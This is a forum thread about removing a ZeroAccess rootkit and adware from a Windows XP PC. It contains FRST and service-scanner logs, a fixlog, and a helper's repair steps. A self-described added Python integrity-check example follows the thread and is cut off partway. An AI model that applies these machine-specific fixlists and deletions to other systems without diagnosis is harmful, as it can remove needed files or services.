    2014-05-30 09:19 - 2014-05-30 07:29 - 00000000 ____D () C:\FRST
    2014-05-30 09:19 - 2013-11-18 00:09 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\uTorrent
    2014-05-30 09:19 - 2012-08-10 10:37 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Temp
    2014-05-30 09:17 - 2014-05-15 14:50 - 00931640 _____ (TENCENT) C:\WINDOWS\system32\TesSafe.sys
    2014-05-30 09:12 - 2013-11-21 20:15 - 00000000 _RSHD () C:\Documents and Settings\Gery\wbgpy
    2014-05-30 08:56 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\wc
    2014-05-30 08:41 - 2013-12-12 20:01 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2014-05-30 08:33 - 2012-08-14 23:22 - 00000974 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-220523388-1085031214-682003330-1003UA.job
    2014-05-30 08:33 - 2012-08-10 21:58 - 00458752 _____ () C:\WINDOWS\system32\config\ACEEvent.evt
    2014-05-30 07:49 - 2013-02-10 14:45 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\GarenaPlus
    2014-05-30 07:49 - 2012-08-14 23:34 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\GarenaMessenger
    2014-05-30 07:47 - 2013-10-09 17:41 - 00000000 ____D () C:\Program Files\Steam
    2014-05-30 07:45 - 2014-05-30 07:45 - 00000000 ____D () C:\Documents and Settings\NetworkService\Local Settings\Application Data\ESET
    2014-05-30 07:45 - 2014-05-29 19:30 - 00000000 ____D () C:\WINDOWS\LastGood.Tmp
    2014-05-30 07:44 - 2012-08-14 23:19 - 00000159 _____ () C:\WINDOWS\wiadebug.log
    2014-05-30 07:44 - 2012-08-14 23:19 - 00000049 _____ () C:\WINDOWS\wiaservc.log
    2014-05-30 07:44 - 2012-08-10 10:36 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
    2014-05-30 07:43 - 2014-05-28 17:31 - 00000241 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-05-30 07:43 - 2012-08-10 10:37 - 00000178 ___SH () C:\Documents and Settings\Gery\ntuser.ini
    2014-05-30 07:43 - 2012-08-10 10:37 - 00000000 ____D () C:\Documents and Settings\Gery
    2014-05-30 07:43 - 2012-08-10 10:36 - 00032560 _____ () C:\WINDOWS\SchedLgU.Txt
    2014-05-30 07:28 - 2014-05-30 07:28 - 01056256 _____ (Farbar) C:\Documents and Settings\Gery\Desktop\FRST.exe
    2014-05-30 05:33 - 2012-08-14 23:22 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-220523388-1085031214-682003330-1003Core.job
    2014-05-29 21:01 - 2014-05-29 21:00 - 00688992 _____ (Swearware) C:\Documents and Settings\Gery\Desktop\dds.com
    2014-05-29 19:41 - 2014-05-29 19:30 - 00005809 _____ () C:\WINDOWS\setupapi.log
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\ESET
    2014-05-29 19:32 - 2014-05-29 19:32 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\ESET
    2014-05-29 19:31 - 2014-05-29 19:31 - 00000000 ____D () C:\Documents and Settings\LocalService\Local Settings\Application Data\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Program Files\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\ESET
    2014-05-29 19:28 - 2014-05-29 19:28 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\ESET
    2014-05-29 18:16 - 2001-08-23 18:00 - 00002206 _____ () C:\WINDOWS\system32\wpa.dbl
    2014-05-29 18:07 - 2014-05-15 17:00 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0001.dat
    2014-05-29 18:06 - 2014-05-15 16:45 - 00000040 _____ () C:\Documents and Settings\All Users\Application Data\DT0006.dat
    2014-05-29 17:54 - 2014-05-29 13:00 - 00000600 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\PUTTY.RND
    2014-05-29 17:48 - 2014-05-15 21:56 - 00002175 _____ () C:\Documents and Settings\All Users\Desktop\China English Patch.lnk
    2014-05-29 17:47 - 2012-08-14 21:06 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\vlc
    2014-05-29 16:08 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Application Data\wyUpdate AU
    2014-05-29 16:07 - 2014-05-27 17:20 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯软件
    2014-05-29 16:07 - 2014-05-15 14:52 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Tencent
    2014-05-29 16:03 - 2012-08-14 21:02 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\DMCache
    2014-05-28 23:48 - 2012-08-10 21:35 - 00000000 __SHD () C:\WINDOWS\CSC
    2014-05-28 22:03 - 2014-05-28 22:03 - 00329096 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-05-28 22:03 - 2014-05-22 10:04 - 00000000 ____D () C:\Program Files\sizlsearch
    2014-05-28 17:24 - 2014-05-28 16:08 - 00000000 __SHD () C:\Documents and Settings\Gery\Local Settings\Application Data\icsxml
    2014-05-28 16:08 - 2014-05-28 16:08 - 00088336 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000038 ___SH () C:\Documents and Settings\Gery\Local Settings\Application Data\1754111884ee9ab5277ca00.95260103
    2014-05-28 16:08 - 2014-05-28 16:08 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000712 _____ () C:\Documents and Settings\All Users\Desktop\BattlePing.lnk
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Program Files\BattlePing
    2014-05-28 16:07 - 2014-05-28 16:07 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\BattlePing
    2014-05-27 17:39 - 2014-05-15 14:52 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Tencent
    2014-05-27 17:20 - 2014-05-15 17:51 - 00000000 ____D () C:\Program Files\Common Files\Tencent
    2014-05-27 17:19 - 2014-05-27 17:19 - 00000000 ____D () C:\Program Files\Tencent
    2014-05-27 00:33 - 2012-08-14 23:21 - 00000000 __SHD () C:\Documents and Settings\Gery\UserData
    2014-05-27 00:30 - 2012-08-14 23:12 - 00096768 _____ () C:\Documents and Settings\Gery\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
    2014-05-26 11:13 - 2013-11-11 16:41 - 00004096 _____ () C:\WINDOWS\system32\crash
    2014-05-25 10:50 - 2001-08-23 18:00 - 00000585 _____ () C:\WINDOWS\win.ini
    2014-05-24 22:12 - 2013-02-07 01:43 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\Media Player Classic
    2014-05-24 22:11 - 2012-09-10 16:10 - 00000000 ____D () C:\WINDOWS\system32\LogFiles
    2014-05-23 11:06 - 2013-02-23 19:16 - 00000716 _____ () C:\Documents and Settings\All Users\Start Menu\LINE.lnk
    2014-05-23 11:06 - 2013-02-23 19:16 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LINE
    2014-05-22 14:39 - 2012-08-14 23:30 - 00002273 _____ () C:\Documents and Settings\Gery\Desktop\Google Chrome.lnk
    2014-05-22 11:35 - 2012-08-10 10:36 - 00000000 __SHD () C:\Documents and Settings\LocalService
    2014-05-16 15:59 - 2014-05-16 15:59 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\17173
    2014-05-16 09:41 - 2014-05-16 09:41 - 00000000 ____D () C:\WINDOWS\system32\mssymbols
    2014-05-15 21:58 - 2014-05-15 21:58 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\LokiReborn
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000732 _____ () C:\Documents and Settings\Gery\Desktop\剑灵_腾讯.lnk
    2014-05-15 20:37 - 2014-05-15 20:37 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\腾讯游戏
    2014-05-15 20:37 - 2012-08-10 10:28 - 00000000 ____D () C:\WINDOWS\system32\DirectX
    2014-05-15 20:02 - 2014-04-06 21:45 - 00002347 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Reader XI.lnk
    2014-05-15 20:01 - 2014-04-06 21:43 - 00000000 ____D () C:\Program Files\Common Files\Adobe
    2014-05-15 19:46 - 2012-08-31 03:31 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
    2014-05-15 19:30 - 2012-08-10 17:09 - 00000000 ___RD () C:\WINDOWS\Web
    2014-05-15 19:30 - 2012-08-10 17:09 - 00000000 ____D () C:\WINDOWS\Help
    2014-05-15 19:25 - 2001-08-23 18:00 - 00000250 _____ () C:\WINDOWS\system.ini
    2014-05-15 18:47 - 2014-05-15 18:47 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Microsoft AppLocale
    2014-05-15 17:01 - 2014-05-15 17:01 - 00000000 ____D () C:\Documents and Settings\All Users\Tencent
    2014-05-15 16:33 - 2014-05-15 16:33 - 00000000 ____D () C:\WINDOWS\Minidump
    2014-05-15 14:51 - 2014-05-15 14:51 - 00000000 ____D () C:\Documents and Settings\Gery\My Documents\BnS
    2014-05-15 14:39 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Local Settings\Application Data\Downloaded Installations
    2014-05-15 14:36 - 2014-05-15 14:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\ÌÚѶÓÎÏ·
    2014-05-15 13:43 - 2012-08-31 03:34 - 00692400 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
    2014-05-15 13:43 - 2012-08-31 03:34 - 00070832 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
    2014-05-15 12:51 - 2014-05-15 12:51 - 00000831 _____ () C:\Documents and Settings\Gery\Start Menu\µTorrent.lnk
    2014-05-15 12:51 - 2013-11-18 00:10 - 00000831 _____ () C:\Documents and Settings\Gery\Desktop\µTorrent.lnk
    2014-05-09 23:04 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Application Data\IDM
    2014-05-06 16:40 - 2014-05-22 11:35 - 00055232 _____ (StdLib) C:\WINDOWS\system32\Drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    2014-05-03 18:37 - 2014-05-03 18:36 - 00000000 ____D () C:\Program Files\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\Gery\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Internet Download Manager
    2014-05-03 18:36 - 2014-05-03 18:36 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\IDM
    ZeroAccess:
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install
    ZeroAccess:
    C:\Program Files\Google\Desktop\Install
     
    ZeroAccess:
    C:\Windows\assembly\GAC\Desktop.ini
     
    Some content of TEMP:
    ====================
    C:\Documents and Settings\Gery\Local Settings\Temp\avgnt.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\ID_140513to140529.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\InstHelper.exe
    C:\Documents and Settings\Gery\Local Settings\Temp\jre-7u60-windows-i586-iftw.exe
     
     
    ==================== Bamital & volsnap Check =================
     
    C:\WINDOWS\explorer.exe => MD5 is legit
    C:\WINDOWS\system32\winlogon.exe => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
    C:\WINDOWS\system32\User32.dll => MD5 is legit
    C:\WINDOWS\system32\userinit.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit
     
    ==================== End Of Log ============================



    Edited by trussardi15, 29 May 2014 - 09:36 PM.


    #6 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • Local time:02:58 PM

    Posted 29 May 2014 - 11:26 PM

    Hey bud! :clapping:

    Just want to tell you that I am going to be away from my PC today; it is 11 AM now, so maybe I will be back tomorrow morning around 9-10 AM.

    See you tomorrow!

     

    Thanks

    Best Regards

    Aiven  :bubbles:



    #7 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 09:04 AM

    Hi,

     

    Let's start with this. Download the attached fixlist.txt to your desktop, run FRST again, and select the "Fix" button. Please post the resulting fixlog.txt.

     

    Next,
     

    Please download Farbar Service Scanner and run it on the computer with the issue.
    • Make sure that all of the options are checked:
     
     
    • Press "Scan".
    • It will create a log (FSS.txt) in the same directory the tool is run.
    • Please copy and paste the log to your reply.
     
     
    How is your computer running now?



    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here.

     

    A.K.A. Buddierdl @ GeeksToGo.com


    #8 trussardi15

    trussardi15
    • Topic Starter

    • Members
    • 13 posts
    • Local time:02:58 PM

    Posted 30 May 2014 - 09:20 AM

    Hi bud! It looks like I came home earlier, so we will start to fix my PC immediately.

    Here it is.

     

    FIXLOG

    Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version:30-05-2014

    Ran by Gery at 2014-05-30 21:00:24 Run:1
    Running from C:\Documents and Settings\Gery\Desktop
    Boot Mode: Normal
     
    ==============================================
     
    Content of fixlist:
    *****************
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Run: [Google Update*] => [X] <===== ATTENTION (ZeroAccess rootkit hidden path)
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)
    C:\Documents and Settings\Gery\Application Data\4102C4
    BHO: No Name - {02478D38-C3F9-4efb-9B51-7695ECA05670} -  No File
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5 03 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    FF Extension: Bruowsee2save - C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk [2013-04-01]
    FF HKLM\...\Firefox\Extensions: [OKitSpace@Vittalia.es] - C:\Documents and Settings\Gery\Application Data\okitspace\Firefox
    C:\Documents and Settings\Gery\Application Data\okitspace
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    S2 Update sizlsearch; "C:\Program Files\sizlsearch\updatesizlsearch.exe" [X]
    S2 Util sizlsearch; "C:\Program Files\sizlsearch\bin\utilsizlsearch.exe" [X]
    S2 *etadpug; "C:\Program Files\Google\Desktop\Install\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\   \   \???\{5be576b1-8633-ed43-6e4f-980ec4dd552d}\GoogleUpdate.exe" < <==== ATTENTION (ZeroAccess)
    R1 {9d5747ee-0448-4681-8337-1555de75a3b6}Gt; C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys [55232 2014-05-06] (StdLib)
    S3 PCFApiUtil; \??\C:\Program Files\Baidu Security\PC Faster\3.7.0.0\PCFApiUtil.sys [X]
    C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys
    S3 BprotectEx; \??\C:\WINDOWS\System32\drivers\BprotectEx.sys [X]
    C:\WINDOWS\System32\drivers\BprotectEx.sys
    S3 EagleNT; \??\C:\DOCUME~1\Gery\LOCALS~1\Temp\EagleNT.sys [X]
    S3 EagleXNt; \??\C:\WINDOWS\system32\drivers\EagleXNt.sys [X]
    C:\Program Files\sizlsearch
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install
    C:\Program Files\Google\Desktop\Install
    C:\Windows\assembly\GAC\Desktop.ini
    File: C:\WINDOWS\system32\mssymbols
    File: C:\Documents and Settings\Gery\Application Data\17173
     
    cmd: netsh winsock reset
     
     
    *****************
     
    HKU\S-1-5-21-220523388-1085031214-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Run\\Google Update* => Value deleted successfully.
    HKU\HKU\S-1-5-21-220523388-1085031214-682003330-1003\...\Policies\Explorer\Run: [FLT] => C:\Documents and Settings\Gery\Application Data\4102C4\4102C4.exe [32768 2008-04-14] (Microsoft Corporation)\Software\Microsoft\Windows\CurrentVersion\Run\\FLT => Value not found.
    C:\Documents and Settings\Gery\Application Data\4102C4 => Moved successfully.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670} => Key deleted successfully.
    HKCR\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670} => Key not found.
    Winsock: Catalog5 entry 000000000001\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
    Winsock: Catalog5 entry 000000000003\\LibraryPath  was set successfully to %SystemRoot%\System32\mswsock.dll
    C:\Documents and Settings\Gery\Application Data\Mozilla\Firefox\Profiles\3s30ge9d.default\Extensions\joiqeii@whth.co.uk => Moved successfully.
    HKLM\Software\Mozilla\Firefox\Extensions\\OKitSpace@Vittalia.es => Value deleted successfully.
    "C:\Documents and Settings\Gery\Application Data\okitspace" => File/Directory not found.
    HKLM\SOFTWARE\Policies\Google => Key deleted successfully.
    Update sizlsearch => Service deleted successfully.
    Util sizlsearch => Service deleted successfully.
    *etadpug => Service deleted successfully.
    {9d5747ee-0448-4681-8337-1555de75a3b6}Gt => Unable to stop service
    {9d5747ee-0448-4681-8337-1555de75a3b6}Gt => Service deleted successfully.
    PCFApiUtil => Service deleted successfully.
    C:\WINDOWS\System32\drivers\{9d5747ee-0448-4681-8337-1555de75a3b6}Gt.sys => Moved successfully.
    BprotectEx => Service deleted successfully.
    "C:\WINDOWS\System32\drivers\BprotectEx.sys" => File/Directory not found.
    EagleNT => Service deleted successfully.
    EagleXNt => Service deleted successfully.
    C:\Program Files\sizlsearch => Moved successfully.
    C:\Documents and Settings\Gery\Local Settings\Application Data\Google\Desktop\Install => Moved successfully.
     
    "C:\Program Files\Google\Desktop\Install" directory move:
     
    Could not move "C:\Program Files\Google\Desktop\Install" directory. => Scheduled to move on reboot.
     
    C:\Windows\assembly\GAC\Desktop.ini => Moved successfully.
     
    ========================= File: C:\WINDOWS\system32\mssymbols ========================
     
    MD5: 
    Creation and modification date: 2014-05-16 09:41 - 2014-05-16 09:41
    Size: 0000000
    Attributes: ----D
    Company Name: 
    Internal Name: 
    Original Name: 
    Product Name: 
    Description: 
    File Version: 
    Product Version: 
    Copyright: 
     
    ====== End Of File: ======
     
     
    ========================= File: C:\Documents and Settings\Gery\Application Data\17173 ========================
     
    MD5: 
    Creation and modification date: 2014-05-16 15:59 - 2014-05-16 15:59
    Size: 0000000
    Attributes: ----D
    Company Name: 
    Internal Name: 
    Original Name: 
    Product Name: 
    Description: 
    File Version: 
    Product Version: 
    Copyright: 
     
    ====== End Of File: ======
     
     
    =========  netsh winsock reset =========
     
    The following helper DLL cannot be loaded: IFMON.DLL.
    The following command was not found: winsock reset.
     
    ========= End of CMD: =========
     
     
    => Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-05-30 21:02:05)<=
     
    C:\Program Files\Google\Desktop\Install => Deleted successfully.
     
    ==== End of Fixlog ====
     
    FSS
    Farbar Service Scanner Version: 21-05-2014
    Ran by Gery (administrator) on 30-05-2014 at 21:04:15
    Running from "C:\Documents and Settings\Gery\Desktop"
    Microsoft Windows XP Professional Service Pack 3 (X86)
    Boot Mode: Normal
    ****************************************************************
     
    Internet Services:
    ============
     
    Connection Status:
    ==============
    Localhost is accessible.
    LAN connected.
    Google IP is accessible.
    Google.com is accessible.
    Yahoo.com is accessible.
     
     
    Windows Firewall:
    =============
    sharedaccess Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to retrieve start type of sharedaccess. The value does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to retrieve ImagePath of sharedaccess. The value does not exist.
    Unable to retrieve ServiceDll of sharedaccess. The value does not exist.
    Checking LEGACY_sharedaccess: ATTENTION!=====> Unable to open LEGACY_sharedaccess\0000 registry key. The key does not exist.
     
     
    Firewall Disabled Policy: 
    ==================
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall"=DWORD:0
     
     
    System Restore:
    ============
    Srservice Service is not running. Checking service configuration:
    The start type of Srservice service is set to Disabled. The default start type is Auto.
    The ImagePath of Srservice service is OK.
    The ServiceDll of Srservice: "C:\WINDOWS\system32\srsvc.dll".
     
    sr Service is not running. Checking service configuration:
    The start type of sr service is set to Disabled. The default start type is Boot.
    The ImagePath of sr: "\SystemRoot\system32\DRIVERS\sr.sys".
     
     
    System Restore Disabled Policy: 
    ========================
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR"=DWORD:1
     
     
    Security Center:
    ============
     
    wscsvc Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open wscsvc registry key. The service key does not exist.
     
     
    Windows Update:
    ============
    wuauserv Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open wuauserv registry key. The service key does not exist.
    Checking LEGACY_wuauserv: ATTENTION!=====> Unable to open LEGACY_wuauserv\0000 registry key. The key does not exist.
     
    BITS Service is not running. Checking service configuration:
    Checking Start type: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking ImagePath: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking ServiceDll: ATTENTION!=====> Unable to open BITS registry key. The service key does not exist.
    Checking LEGACY_BITS: ATTENTION!=====> Unable to open LEGACY_BITS\0000 registry key. The key does not exist.
     
     
    Windows Autoupdate Disabled Policy: 
    ============================
     
     
    Other Services:
    ==============
    Checking Start type of SharedAccess: ATTENTION!=====> Unable to retrieve start type of SharedAccess. The value does not exist.
    Checking ImagePath of SharedAccess: ATTENTION!=====> Unable to retrieve ImagePath of SharedAccess. The value does not exist.
    Checking ServiceDll of SharedAccess: ATTENTION!=====> Unable to retrieve ServiceDll of SharedAccess. The value does not exist.
    Checking Start type of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking ImagePath of PolicyAgent: ATTENTION!=====> Unable to open PolicyAgent registry key. The service key does not exist.
    Checking Start type of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ImagePath of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
    Checking ServiceDll of RemoteAccess: ATTENTION!=====> Unable to open RemoteAccess registry key. The service key does not exist.
     
     
     
    File Check:
    ========
    C:\WINDOWS\system32\dhcpcsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\afd.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\netbt.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\tcpip.sys => MD5 is legit
    C:\WINDOWS\system32\Drivers\ipsec.sys => MD5 is legit
    C:\WINDOWS\system32\dnsrslvr.dll => MD5 is legit
    C:\WINDOWS\system32\ipnathlp.dll => MD5 is legit
    C:\WINDOWS\system32\netman.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\srsvc.dll => MD5 is legit
    C:\WINDOWS\system32\Drivers\sr.sys => MD5 is legit
    C:\WINDOWS\system32\wscsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wbem\WMIsvc.dll => MD5 is legit
    C:\WINDOWS\system32\wuauserv.dll => MD5 is legit
    C:\WINDOWS\system32\qmgr.dll => MD5 is legit
    C:\WINDOWS\system32\es.dll => MD5 is legit
    C:\WINDOWS\system32\cryptsvc.dll => MD5 is legit
    C:\WINDOWS\system32\svchost.exe => MD5 is legit
    C:\WINDOWS\system32\rpcss.dll => MD5 is legit
    C:\WINDOWS\system32\services.exe => MD5 is legit
     
    Extra List:
    =======
    Epfwndis(11) epfwtdi(12) Gpc(6) IPSec(4) NetBT(5) PSched(7) Tcpip(3) 
    0x0C000000040000000100000002000000030000000C0000000A00000005000000060000000700000008000000090000000B000000
    IpSec Tag value is correct.
     
    **** End of log ****
     
    (edit)
    Sorry, I forgot to answer your question.
    WOW! Now the notifications or reports about that virus or malware are not showing anymore, and I can open my game that previously could not be opened.

    Edited by trussardi15, 30 May 2014 - 09:24 AM.


    #9 Bud_91

    Bud_91

    • Malware Response Team
    • 438 posts
    • Gender:Male
    • Local time:03:58 AM

    Posted 30 May 2014 - 09:39 AM

    Glad it's working better, but we still have work to do.

     

    Step 1: Fix services.
     
    Download the ESET services repair tool, extract the file to your desktop.
    • Double-click ServicesRepair.exe.
    • If security notifications appear, click Continue or Run and then click Yes when asked if you want to proceed.
    • Once the tool has finished, you will be prompted to restart your computer. Click Yes to restart.
    • A log will be saved in the CCSupport folder the tool created on your desktop, please post the content in your next reply.
    • Also, please run Farbar's Service Scanner again and post a new log.
     
    Step 2: Run JRT.
     
    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
     
    Step 3: Scan system files.
     
    We need to scan your computer with the Windows System File Checker:

    The sfc /scannow command (System File Checker) scans the integrity of all protected Windows system files and replaces corrupted, modified, or incorrect versions with the correct versions if possible.

    Note: Be aware that if you have modified your system files, as in theming explorer/system files, running sfc /scannow will revert the system files such as explorer.exe back to their default state.

    Note: Make the appropriate backups of your system files that you have modified for theming if you wish to save them before running sfc /scannow.

    For Windows XP:

    • Click on the Start button, then Run...
    • In the box that appears, type cmd and press Enter

    Next:

    • Copy and paste the following line of text into the black box:
      note: to paste, right-click in the black box and choose Paste

      sfc /scannow
    • Press Enter to run the command
      note: this scan may take a while to finish, and if SFC reports that it could not fix something, run the command again to see if it is able to the next time. Sometimes it may take running the sfc /scannow command 3 or more times to completely fix everything that it is able to.
     
    Things I need in your next reply:

     

    • ESET Service Scanner log
    • New FSS log
    • JRT log
    • Was SFC able to repair any errors?
     

    If I have not responded to your log in 36 hours, feel free to send me a PM.

    If you would like to make a thank-you donation, please click here.

     

    A.K.A. Buddierdl @ GeeksToGo.com
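The "MD5 is legit" lines in the FRST Bamital check and the FSS File Check earlier in this thread, and the sfc /scannow description in the post above, rest on the same idea: compare protected system files against known-good digests and flag anything that differs, which is how a replaced services.exe or volsnap.sys would be caught. The following is an added example, not code from the thread or from Farbar's or Microsoft's tools; it shows that comparison in Python against a constructed baseline. The directory tree, file contents, baseline digests and the staged tampering are all built in a temporary folder for the demo and are not the poster's real files. SHA-256 is used in place of MD5.

```python
"""File-integrity check in the spirit of FRST's "MD5 is legit" lines and SFC.

Added example, not part of the forum thread or of Farbar's tools. The
baseline manifest and sample files below are constructed for the demo.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk_size: int = 1 << 16) -> str:
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_integrity(baseline: dict[str, str], root: Path) -> dict[str, str]:
    """Compare each file under `root` with the known-good digest in `baseline`.

    Returns one verdict per relative path: "legit", "modified" or "missing".
    A "modified" verdict on a file such as services.exe is exactly the case
    the Bamital check in the log is looking for; "missing" covers a protected
    file that was deleted rather than replaced.
    """
    verdicts: dict[str, str] = {}
    for rel_path, expected in baseline.items():
        target = root / rel_path
        if not target.is_file():
            verdicts[rel_path] = "missing"
        elif sha256_file(target) == expected.lower():
            verdicts[rel_path] = "legit"
        else:
            verdicts[rel_path] = "modified"
    return verdicts


def build_demo_tree() -> tuple[Path, dict[str, str]]:
    """Create a constructed stand-in for a system directory plus its baseline.

    Three cases are staged: an untouched file, a file altered after the
    baseline was recorded, and a file that was deleted afterwards.
    The file names echo the log but the contents are invented placeholders.
    """
    root = Path(tempfile.mkdtemp(prefix="integrity_demo_"))
    (root / "system32").mkdir()
    files = {
        "system32/services.exe": b"original services binary (constructed)",
        "system32/winlogon.exe": b"original winlogon binary (constructed)",
        "system32/volsnap.sys": b"original volsnap driver (constructed)",
    }
    for rel_path, content in files.items():
        (root / rel_path).write_bytes(content)
    # The baseline is recorded while everything is still pristine.
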